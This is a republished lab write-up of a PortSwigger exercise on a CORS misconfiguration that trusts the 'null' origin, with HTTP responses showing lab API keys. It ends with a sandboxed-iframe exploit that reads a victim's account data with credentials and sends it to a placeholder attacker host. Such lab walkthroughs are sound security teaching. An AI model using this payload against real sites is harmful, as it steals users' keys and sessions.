This content originally appeared on DEV Community 👩💻👨💻 and was authored by Christian Paez
In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
We can see that the Access-Control-Allow-Credentials: true is present, let's try to duplicate this request and change the Origin header to something like Origin: <https://example.com> and see if this value is reflected, the resulting response will be something like this:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
The Origin set in the request headers is not present in the Access-Control-Allow-Origin response headers, this could mean that the server does not have CORS vulnerabilities, let's try setting the Origin header to null :
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
The null Origin set in the request headers is present in the Access-Control-Allow-Origin response headers, this confirms us that this request has a CORS vulnerability via null origin, let's use the reading material's sandboxed iframe template to craft our exploit so that the request is sent with the Origin header set to null:
<html>
<iframe sandbox='allow-scripts allow-top-navigation allow-forms' src=\"data:text/html<script>,
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>\"></iframe>
</html>
Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin
This content originally appeared on DEV Community 👩💻👨💻 and was authored by Christian Paez
Christian Paez | Sciencx (2023-01-19T16:44:07+00:00) Portswigger’s lab write up: CORS vulnerability with trusted null origin. Retrieved from https://www.scien.cx/2023/01/19/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.